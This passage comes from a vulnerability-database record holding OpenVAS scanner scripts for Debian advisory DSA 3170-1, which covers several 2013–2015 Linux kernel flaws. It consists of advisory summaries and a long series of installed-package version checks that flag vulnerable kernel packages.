{\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-libc-dev\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-manual-3.2\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-source-3.2\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"linux-support-3.2.0-4\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"xen-linux-system-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:53:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9644", "CVE-2014-7822", "CVE-2015-1420", "CVE-2015-1593", "CVE-2014-8160", "CVE-2015-1421", "CVE-2014-8559", "CVE-2015-0239", "CVE-2013-7421", "CVE-2014-9683", "CVE-2014-9585"], "description": "Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a denial of service, information\nleaks or privilege escalation.\n\nCVE-2013-7421 /\nCVE-2014-9644\nIt was discovered that the Crypto API allowed unprivileged users\nto load arbitrary kernel modules. A local user can use this flaw\nto exploit vulnerabilities in modules that would not normally be\nloaded.\n\nCVE-2014-7822\nAkira Fujita found that the splice() system call did not validate\nthe given file offset and length. A local unprivileged user can use\nthis flaw to cause filesystem corruption on ext4 filesystems, or\npossibly other effects.\n\nCVE-2014-8160\nFlorian Westphal discovered that a netfilter (iptables/ip6tables) rule\naccepting packets to a specific SCTP, DCCP, GRE or UDPlite\nport/endpoint could result in incorrect connection tracking state.\nIf only the generic connection tracking module (nf_conntrack) was\nloaded, and not the protocol-specific connection tracking module,\nthis would allow access to any port/endpoint of the specified\nprotocol.\n\nCVE-2014-8559\nIt was found that kernel functions that iterate over a directory\ntree can dead-lock or live-lock in case some of the directory\nentries were recently deleted or dropped from the cache. A local\nunprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\nAndy Lutomirski discovered that address randomisation for the vDSO\nin 64-bit processes is extremely biased. A local unprivileged user\ncould potentially use this flaw to bypass the ASLR protection\nmechanism.\n\nCVE-2014-9683\nDmitry Chernenkov discovered that eCryptfs writes past the end of\nthe allocated buffer during encrypted filename decoding, resulting\nin local denial of service.\n\nCVE-2015-0239\nIt was found that KVM did not correctly emulate the x86 SYSENTER\ninstruction. An unprivileged user within a guest system that has\nnot enabled SYSENTER, for example because the emulated CPU vendor\nis AMD, could potentially use this flaw to cause a denial of\nservice or privilege escalation in that guest.\n\nCVE-2015-1420\nIt was discovered that the open_by_handle_at() system call reads\nthe handle size from user memory a second time after validating\nit. A local user with the CAP_DAC_READ_SEARCH capability could use\nthis flaw for privilege escalation.\n\nCVE-2015-1421\nIt was found that the SCTP implementation could free an\nauthentication state while it was still in use, resulting in heap\ncorruption. This could allow remote users to cause a denial of\nservice or privilege escalation.\n\nCVE-2015-1593\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy.\nA local unprivileged user could potentially use this flaw to\nbypass the ASLR protection mechanism.", "modified": "2017-07-07T00:00:00", "published": "2015-02-23T00:00:00", "id": "OPENVAS:703170", "href": "http://plugins.openvas.org/nasl.php?oid=703170", "type": "openvas", "title": "Debian Security Advisory DSA 3170-1 (linux - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3170.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3170-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703170);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2013-7421\", \"CVE-2014-7822\", \"CVE-2014-8160\", \"CVE-2014-8559\",\n \"CVE-2014-9585\", \"CVE-2014-9644\", \"CVE-2014-9683\", \"CVE-2015-0239\",\n \"CVE-2015-1420\", \"CVE-2015-1421\", \"CVE-2015-1593\");\n script_name(\"Debian Security Advisory DSA 3170-1 (linux - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-02-23 00:00:00 +0100 (Mon, 23 Feb 2015)\");\n script_tag(name: \"cvss_base\", value: \"10.0\");\n script_tag(name: \"cvss_base_vector\", value: \"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3170.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"linux on Debian Linux\");\n script_tag(name: \"insight\", value: \"The Linux kernel is the core of the Linux\noperating system.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 3.2.65-1+deb7u2. Additionally this update\nfixes regressions introduced in versions 3.2.65-1 and 3.2.65-1+deb7u1.\n\nFor the upcoming stable distribution (jessie), these problems will be fixed\nsoon (a subset is fixed already).\n\nFor the unstable distribution (sid), these problems will be fixed soon\n(a subset is fixed already).\n\nWe recommend that you upgrade your linux packages.\");\n script_tag(name: \"summary\", value: \"Several vulnerabilities have been\ndiscovered in the Linux kernel that may lead to a denial of service, information\nleaks or privilege escalation.\n\nCVE-2013-7421 /\nCVE-2014-9644\nIt was discovered that the Crypto API allowed unprivileged users\nto load arbitrary kernel modules. A local user can use this flaw\nto exploit vulnerabilities in modules that would not normally be\nloaded.\n\nCVE-2014-7822\nAkira Fujita found that the splice() system call did not validate\nthe given file offset and length. A local unprivileged user can use\nthis flaw to cause filesystem corruption on ext4 filesystems, or\npossibly other effects.\n\nCVE-2014-8160\nFlorian Westphal discovered that a netfilter (iptables/ip6tables) rule\naccepting packets to a specific SCTP, DCCP, GRE or UDPlite\nport/endpoint could result in incorrect connection tracking state.\nIf only the generic connection tracking module (nf_conntrack) was\nloaded, and not the protocol-specific connection tracking module,\nthis would allow access to any port/endpoint of the specified\nprotocol.\n\nCVE-2014-8559\nIt was found that kernel functions that iterate over a directory\ntree can dead-lock or live-lock in case some of the directory\nentries were recently deleted or dropped from the cache. A local\nunprivileged user can use this flaw for denial of service.\n\nCVE-2014-9585\nAndy Lutomirski discovered that address randomisation for the vDSO\nin 64-bit processes is extremely biased. A local unprivileged user\ncould potentially use this flaw to bypass the ASLR protection\nmechanism.\n\nCVE-2014-9683\nDmitry Chernenkov discovered that eCryptfs writes past the end of\nthe allocated buffer during encrypted filename decoding, resulting\nin local denial of service.\n\nCVE-2015-0239\nIt was found that KVM did not correctly emulate the x86 SYSENTER\ninstruction. An unprivileged user within a guest system that has\nnot enabled SYSENTER, for example because the emulated CPU vendor\nis AMD, could potentially use this flaw to cause a denial of\nservice or privilege escalation in that guest.\n\nCVE-2015-1420\nIt was discovered that the open_by_handle_at() system call reads\nthe handle size from user memory a second time after validating\nit. A local user with the CAP_DAC_READ_SEARCH capability could use\nthis flaw for privilege escalation.\n\nCVE-2015-1421\nIt was found that the SCTP implementation could free an\nauthentication state while it was still in use, resulting in heap\ncorruption. This could allow remote users to cause a denial of\nservice or privilege escalation.\n\nCVE-2015-1593\nIt was found that address randomisation for the initial stack in\n64-bit processes was limited to 20 rather than 22 bits of entropy.\nA local unprivileged user could potentially use this flaw to\nbypass the ASLR protection mechanism.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"linux-doc-3.2\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-486\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-4kc-malta\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-5kc-malta\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armel\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-armhf\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-i386\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-ia64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mips\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-mipsel\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-powerpc\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-s390x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-all-sparc\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-common-rt\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-iop32x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-itanium\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-ixp4xx\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-kirkwood\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-loongson-2f\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mckinley\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mv78xx0\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-mx5\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-octeon\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-omap\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-orion5x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc-smp\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-powerpc64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r4k-ip22\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-cobalt\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-r5k-ip32\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-rt-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-s390x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-sparc64-smp\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-versatile\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-headers-3.2.0-4-vexpress\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-486\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-4kc-malta\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-5kc-malta\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-686-pae-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-amd64-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-iop32x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-itanium\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-ixp4xx\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-kirkwood\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-loongson-2f\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mckinley\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mv78xx0\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-mx5\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-octeon\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-omap\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-orion5x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc-smp\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-powerpc64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r4k-ip22\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-cobalt\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-r5k-ip32\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-686-pae-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-rt-amd64-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-dbg\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-s390x-tape\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1-bcm91250a\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sb1a-bcm91480b\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-sparc64-smp\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-versatile\", ver:\"3.2.65-1+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"linux-image-3.2.0-4-vexpress\", 